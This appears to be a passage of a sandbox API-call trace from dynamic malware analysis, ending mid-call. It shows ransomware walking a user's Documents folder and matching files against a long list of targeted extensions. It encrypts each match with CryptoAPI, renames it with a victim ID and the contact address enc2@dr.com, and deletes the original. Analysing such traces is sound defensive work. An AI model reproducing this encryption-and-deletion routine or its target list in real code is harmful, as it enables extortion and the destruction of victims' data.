	[0186.460] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x191a22e0, ftCreationTime.dwHighDateTime=0x1d96778, ftLastAccessTime.dwLowDateTime=0xbba64d90, ftLastAccessTime.dwHighDateTime=0x1d96e44, ftLastWriteTime.dwLowDateTime=0xbba64d90, ftLastWriteTime.dwHighDateTime=0x1d96e44, nFileSizeHigh=0x0, nFileSizeLow=0x744c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PuA1EQ-HG-NJGInJNL.odp", cAlternateFileName="PUA1EQ~1.ODP")) returned 1
	[0186.461] lstrcmpW (lpString1="PuA1EQ-HG-NJGInJNL.odp", lpString2="..") returned 1
	[0186.461] lstrcmpW (lpString1="PuA1EQ-HG-NJGInJNL.odp", lpString2=".") returned 1
	[0186.461] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.461] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="PuA1EQ-HG-NJGInJNL.odp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\PuA1EQ-HG-NJGInJNL.odp") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\PuA1EQ-HG-NJGInJNL.odp"
	[0186.461] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\PuA1EQ-HG-NJGInJNL.odp") returned 54
	[0186.461] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.461] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\PuA1EQ-HG-NJGInJNL.odp", cchLength=0x36 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp") returned 0x36
	[0186.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.462] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.462] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp") returned="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp"
	[0186.462] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp") returned 54
	[0186.462] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.463] StrStrW (lpFirst=".odp", lpSrch=".") returned=".odp"
	[0186.463] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.463] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odp") returned=".odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.464] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.465] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.465] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.468] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x744c, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x744c, lpOverlapped=0x0) returned 1
	[0186.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.472] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcba18) returned 1
	[0186.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.474] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.474] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.475] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0186.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.475] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x744c, dwBufLen=0x744c | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x7450) returned 1
	[0186.476] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.477] RtlMoveMemory (in: Destination=0xfe45d8, Source=0xfdd180, Length=0x744c | out: Destination=0xfe45d8) 
	[0186.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.477] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe45d8*, pdwDataLen=0x18bc0c*=0x744c, dwBufLen=0x7450 | out: pbData=0xfe45d8*, pdwDataLen=0x18bc0c*=0x7450) returned 1
	[0186.480] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.480] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0186.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.481] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0186.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.481] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0186.481] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.481] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.482] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.483] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 96
	[0186.483] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.484] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe45d8*, nNumberOfBytesToWrite=0x7450, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe45d8*, lpNumberOfBytesWritten=0x18c068*=0x7450, lpOverlapped=0x0) returned 1
	[0186.488] CloseHandle (hObject=0x2c0) returned 1
	[0186.488] CloseHandle (hObject=0x384) returned 1
	[0186.488] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp")) returned 1
	[0186.747] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pua1eq-hg-njginjnl.odp")) returned 0
	[0186.747] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd268fd0, ftCreationTime.dwHighDateTime=0x1d96d30, ftLastAccessTime.dwLowDateTime=0xb54fe980, ftLastAccessTime.dwHighDateTime=0x1d97117, ftLastWriteTime.dwLowDateTime=0xb54fe980, ftLastWriteTime.dwHighDateTime=0x1d97117, nFileSizeHigh=0x0, nFileSizeLow=0x4ab8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VNt7G2BFZefn4rCPt3R.odp", cAlternateFileName="VNT7G2~1.ODP")) returned 1
	[0186.748] lstrcmpW (lpString1="VNt7G2BFZefn4rCPt3R.odp", lpString2="..") returned 1
	[0186.748] lstrcmpW (lpString1="VNt7G2BFZefn4rCPt3R.odp", lpString2=".") returned 1
	[0186.748] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.748] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="VNt7G2BFZefn4rCPt3R.odp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\VNt7G2BFZefn4rCPt3R.odp") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\VNt7G2BFZefn4rCPt3R.odp"
	[0186.748] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\VNt7G2BFZefn4rCPt3R.odp") returned 55
	[0186.748] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.748] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\VNt7G2BFZefn4rCPt3R.odp", cchLength=0x37 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp") returned 0x37
	[0186.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.749] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.749] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp") returned="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp"
	[0186.749] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp") returned 55
	[0186.749] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.750] StrStrW (lpFirst=".odp", lpSrch=".") returned=".odp"
	[0186.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.750] StrStrW 